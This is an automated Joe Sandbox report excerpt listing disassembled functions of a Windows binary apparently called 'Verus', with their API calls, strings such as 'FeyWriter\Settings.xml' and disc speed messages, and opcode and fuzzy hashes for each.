Part of subcall function 00477350: MultiByteToWideChar.KERNEL32(00000001,?,004267F4,?,?,00000107), ref: 00477384

_swscanf.LIBCMT ref: 00434D4F

Part of subcall function 004772E0: lstrlenW.KERNEL32(]MC,?,00434D5D,?,?,?,?,?,?,?,?,?,?,?,?,00000058), ref: 004772E6

Part of subcall function 0042F630: CloseHandle.KERNEL32(?), ref: 0042F663

Strings

'%[^']' '%[^']' '%[^']' %[^, xrefs: 00434D49
dev='%c:'%[^, xrefs: 00434CFA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _swscanf$ApisByteCharCloseFileHandleMultiWide_memset_vscan_fnlstrlen
String ID: '%[^']' '%[^']' '%[^']' %[^$dev='%c:'%[^
API String ID: 2503799851-1342612763
Opcode ID: 041fc43e7184f9b27e8e61083923dd7c906eb577341d1e53dd36a7a1a7385786
Instruction ID: ef2592549d6f34e406229430098089ad47aa4c535c852342402efc439bec79d0
Opcode Fuzzy Hash: 041fc43e7184f9b27e8e61083923dd7c906eb577341d1e53dd36a7a1a7385786
Instruction Fuzzy Hash: BC31C4B2504344AFD730DB55CC85FE7B7E8AF89324F004A1EF59957192EA78B1098B29

Function 0044A030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D,?,0044233C,?,?,?,?,?,?,?,?), ref: 0044A066
FlushInstructionCache.KERNEL32(00000000,?,0044233C,?,?,?,?,?,?,?,?), ref: 0044A06D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E,?,0044233C,?,?,?,?,?,?,?,?), ref: 0044A087

Part of subcall function 00416220: RaiseException.KERNEL32(C0000005,00000001,?,?), ref: 00416232
Part of subcall function 00416220: GetCurrentThreadId.KERNEL32 ref: 0041624C
Part of subcall function 00416220: EnterCriticalSection.KERNEL32(?), ref: 00416259
Part of subcall function 00416220: LeaveCriticalSection.KERNEL32(?), ref: 00416269

CreateWindowExW.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,?,?), ref: 0044A103

Strings

<#D, xrefs: 0044A074

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CriticalCurrentHeapProcessSection$AllocCacheCreateEnterErrorExceptionFlushInstructionLastLeaveRaiseThreadWindow
String ID: <#D
API String ID: 3956295412-489174798
Opcode ID: 1d57bfdbe18f3ee59aaa01f433040bf096eb37a762d02b47e04c5b0e72ffbf70
Instruction ID: fbfe8107cb0ddff9213bd8682431f2aaf7805e73febb454e9339cc6f6fecb39d
Opcode Fuzzy Hash: 1d57bfdbe18f3ee59aaa01f433040bf096eb37a762d02b47e04c5b0e72ffbf70
Instruction Fuzzy Hash: 7B2180726043109FE320DF69E848E67BBE8EFC9710F058A5EF4459B2A1D674EC40C7A6

Function 0042C650 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042C690

Part of subcall function 00444320: IsWindow.USER32(?), ref: 00444336
Part of subcall function 00444320: _vswprintf_s.LIBCMT ref: 0044435A
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 0044436C
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0044437F
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 0044438E
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,AD5E02B4), ref: 0044439C
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 004443A2
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004443AF
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 004443BE
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,004C91E0), ref: 004443D0
Part of subcall function 00444320: lstrlenW.KERNEL32(AD5E02B4), ref: 004443E4

Strings

*, xrefs: 0042C6C3
Warning: Received wrong code page 0x%.2X (expected 0x2A)., xrefs: 0042C71B
Debug: Read speed is %d, write speed is %d., xrefs: 0042C733
Z, xrefs: 0042C6BE

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$LengthText$_memset_vswprintf_slstrlen
String ID: Debug: Read speed is %d, write speed is %d.$ Warning: Received wrong code page 0x%.2X (expected 0x2A).$*$Z
API String ID: 2741816618-2931833978
Opcode ID: 9b477cbe95ee9e2dc7db6f10b25e366c7ca1be00b2445a74903d907f17b93787
Instruction ID: a38a66dc8ebd699673e0ab8a49f4769a66e3c7f92b10cefe4b884f3855fd4558
Opcode Fuzzy Hash: 9b477cbe95ee9e2dc7db6f10b25e366c7ca1be00b2445a74903d907f17b93787
Instruction Fuzzy Hash: EC212D702083916ED3509B659401B7FBBE4AFD9704F44491FF9C897282E3789605CB27

Function 0041E740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000452,?), ref: 0041E78F
SetDlgItemTextW.USER32(?,000004AD,?), ref: 0041E7B4
SetDlgItemTextW.USER32(?,00000493,?), ref: 0041E7D9
SetDlgItemTextW.USER32(?,00000494,?), ref: 0041E7FE

Strings

config, xrefs: 0041E755

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: config
API String ID: 3367045223-3565825916
Opcode ID: 1dc23e88e37bd27423f2b3b44e43190250d026657f4d345dde9cc478409d7e1d
Instruction ID: 2d559d6255ebf1891636c1cf241e36a2f2a8de44226ed50417b8ee0c4489c79d
Opcode Fuzzy Hash: 1dc23e88e37bd27423f2b3b44e43190250d026657f4d345dde9cc478409d7e1d
Instruction Fuzzy Hash: C1118EB93442007FEA089B51DC82DBBA35ADBC5720F14C45FBF555B3C2DA74E8028A69

Function 0043A9C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000001,?), ref: 0043AA09
SetDlgItemTextW.USER32(?,00000002,?), ref: 0043AA28
SetDlgItemTextW.USER32(?,0000044B,?), ref: 0043AA4D
SetDlgItemTextW.USER32(?,00000449,?), ref: 0043AA72

Strings

edittrack, xrefs: 0043A9D5

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: edittrack
API String ID: 3367045223-973092702
Opcode ID: 5de886f3a30ab4cdd9561954a6da17d9f285cba10ffce5b2ab6b251c852c2b04
Instruction ID: 664a783c8e39a5d9e57ccd5e2aac9cb8c1e8cdf0d891fdd7398afe9dd24dfbe4
Opcode Fuzzy Hash: 5de886f3a30ab4cdd9561954a6da17d9f285cba10ffce5b2ab6b251c852c2b04
Instruction Fuzzy Hash: 111190BA3402006FD908EB50DD82EBBA35ADBC4714F14C44FFA455B382DA74EC029B66

Function 00456D70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000001,?), ref: 00456DB9
SetDlgItemTextW.USER32(?,00000002,?), ref: 00456DD8
SetDlgItemTextW.USER32(?,000003FA,?), ref: 00456DFD
SetDlgItemTextW.USER32(?,000003F0,?), ref: 00456E22

Strings

progress, xrefs: 00456D85

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: progress
API String ID: 3367045223-570552902
Opcode ID: bb5bd2ffae4c78cbbf07785fd10123b06fff46cfa6f63a2bad00366cd2d0330f
Instruction ID: 8071b112e2049805c54e72bbd700e30a210de1a539776d5908d7360ed13fea90
Opcode Fuzzy Hash: bb5bd2ffae4c78cbbf07785fd10123b06fff46cfa6f63a2bad00366cd2d0330f
Instruction Fuzzy Hash: BC116DBA3402006BD9089B50CC92EBBA36ADBC4715F15C45EFE454B386DA74AC068A65

Function 00421060 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000456,?), ref: 004210AF
SetDlgItemTextW.USER32(?,00000457,?), ref: 004210D4
SetDlgItemTextW.USER32(?,00000459,?), ref: 004210F9
SetDlgItemTextW.USER32(?,00000458,?), ref: 0042111E

Strings

config, xrefs: 00421075

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: config
API String ID: 3367045223-3565825916
Opcode ID: 54667934fa57017a65b4bb72e8dc21e341391cda8607cad0acd2199c4f102d15
Instruction ID: d10e271f486dfd43d3a0dcf15a19a86bc39acc27f9c2bbea24903e9198f6da67
Opcode Fuzzy Hash: 54667934fa57017a65b4bb72e8dc21e341391cda8607cad0acd2199c4f102d15
Instruction Fuzzy Hash: DE1190B9344610BFDA089B90EC82D7BA35ADBC4711F14C44FBB555B386DA74DC028B69

Function 00456E30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(?,000003E8,00000402,-00000048,00000000), ref: 00456E89
GetWindowTextW.USER32(?,?,00000040), ref: 00456EDA
GetParent.USER32(?), ref: 00456F01
SetWindowTextW.USER32(00000000,?), ref: 00456F10

Strings

%d%% - %s, xrefs: 00456EE6

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: TextWindow$ItemMessageParentSend
String ID: %d%% - %s
API String ID: 66556694-973148635
Opcode ID: 5f5be4db459b91588cc23ffbf49a75978fe3b11611f045574c67e4c6822e9138
Instruction ID: 5a079b73f642cc5336cfaf00c8a235e61e17e693f66708aa4863636545b60466
Opcode Fuzzy Hash: 5f5be4db459b91588cc23ffbf49a75978fe3b11611f045574c67e4c6822e9138
Instruction Fuzzy Hash: 102128B29003407BE730DB24DC0AFFB7BE89B85704F44491EF28947283CA785508CB69

Function 00468630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0046864F
IsWindow.USER32(?), ref: 00468671
_memset.LIBCMT ref: 0046868F
SendMessageW.USER32 ref: 004686EC

Strings

,, xrefs: 004686CC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$CallMessageProcSend_memset
String ID: ,
API String ID: 389358227-3772416878
Opcode ID: 4bd51616daed3938d4aaf93aa0338220292722b99c2dca479a1a42eb6a354dfd
Instruction ID: d5a39c6f037dc47df642f42e3ffd49fdc0bfed904b32593610f41791cd8527d0
Opcode Fuzzy Hash: 4bd51616daed3938d4aaf93aa0338220292722b99c2dca479a1a42eb6a354dfd
Instruction Fuzzy Hash: FD21F6B1608300AFD354DF6AD984A5BBBF8FBC9714F00492EF689C3240D775A804CB66

Function 0043E6E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000001,?), ref: 0043E739
SetDlgItemTextW.USER32(?,00000002,?), ref: 0043E758
SetDlgItemTextW.USER32(?,00000472,?), ref: 0043E77D

Strings

info, xrefs: 0043E705
strings, xrefs: 0043E6F5

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: info$strings
API String ID: 3367045223-3345338029
Opcode ID: afb776630dbcc147461116179f93c437d41b67ad980a0b2f4a3bf642947b9079
Instruction ID: e9413ee185e2bee877cce9382d97c82a308024206800c47fb4ca885f6b502386
Opcode Fuzzy Hash: afb776630dbcc147461116179f93c437d41b67ad980a0b2f4a3bf642947b9079
Instruction Fuzzy Hash: DA11C1B93002006FD908AB51C992EBB635ADBC8714F11C14EFE455F3C2DBB8AC028A68

Function 00444B80 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 00416AF0: _memset.LIBCMT ref: 00416B0B
Part of subcall function 00416AF0: lstrlenW.KERNEL32(?), ref: 00416B9B
Part of subcall function 00416AF0: lstrcpynW.KERNEL32(?,?,00000104), ref: 00416BAD

GetActiveWindow.USER32 ref: 00444BF0

Part of subcall function 00416740: GetOpenFileNameW.COMDLG32(?), ref: 00416769

Part of subcall function 00443850: SendMessageW.USER32(?,000000BD,00000000,00000000), ref: 004438D2
Part of subcall function 00443850: LocalLock.KERNEL32(00000000), ref: 004438E1
Part of subcall function 00443850: GetWindowTextLengthW.USER32(?), ref: 004438ED
Part of subcall function 00443850: IsWindowUnicode.USER32(?), ref: 004438F9

Part of subcall function 004431E0: MessageBoxW.USER32(?,?,?,?), ref: 00443271

Strings

LHL, xrefs: 00444BDD
txt, xrefs: 00444BCD
Text Documents (*.txt), xrefs: 00444BBE
Untitled, xrefs: 00444BC8

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Message$ActiveFileLengthLocalLockNameOpenSendTextUnicode_memsetlstrcpynlstrlen
String ID: LHL$Text Documents (*.txt)$Untitled$txt
API String ID: 993417313-3960092738
Opcode ID: a9675bf0b35f1ce690a33c2a0725cb5ad20419bf75393b50aec6638bbc86855d
Instruction ID: 1b53d01b19617bc88cc2fb63dc40e6bb171fb26857ab0befc9ed7e2dd03755ed
Opcode Fuzzy Hash: a9675bf0b35f1ce690a33c2a0725cb5ad20419bf75393b50aec6638bbc86855d
Instruction Fuzzy Hash: 6521D2B5604740AFE364DB24D982F9B73D8BB88714F004A2EF559832C1DB789404C75E

Function 00464FD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?,AD5E0258,00000000,00539B04,00465240,?,00000000,AD5E0258,?,?), ref: 00465005
lstrcatW.KERNEL32(?,FeyWriter\,?,?,?,?,?,?,?), ref: 0046503A
lstrcatW.KERNEL32(?,Settings.xml), ref: 00465072

Strings

Settings.xml, xrefs: 0046506C
FeyWriter\, xrefs: 00465034

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcat$FolderPath
String ID: FeyWriter\$Settings.xml
API String ID: 2240848463-2884599786
Opcode ID: cdb9552f5330d30b5e6589e4b6dec35a2d0cb857e51e23aa5f57e0a573cf88b2
Instruction ID: 63191a5d0929ddebe89cdf518ccbb70db19216347111feb17b981895374299b4
Opcode Fuzzy Hash: cdb9552f5330d30b5e6589e4b6dec35a2d0cb857e51e23aa5f57e0a573cf88b2
Instruction Fuzzy Hash: B411A776508740ABD250EB15DC42FCBBBD4EFD5738F40452EF555922D1E734A104CAAA

Function 00406B70 Relevance: 7.8, APIs: 5, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49895b7689b545fd6e9d1eb21908be788141c0acdf171405dd4989e487b12921
Instruction ID: 541109bcb95b0f23108093ccb0b68bdb0e48f97bbdf43b0faf2a9fc0f4963de6
Opcode Fuzzy Hash: 49895b7689b545fd6e9d1eb21908be788141c0acdf171405dd4989e487b12921
Instruction Fuzzy Hash: 12B1E875A01109EFCB08DF98D991DAEB7B6FF88304F208569F816A7381D734AE11CB94

Function 0045C4F0 Relevance: 7.7, APIs: 5, Instructions: 221stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,00000008,00000000,?,00000103), ref: 0045C662
lstrcpyW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,00000008,00000000,?), ref: 0045C68B
lstrcatW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,00000008,00000000,?), ref: 0045C697
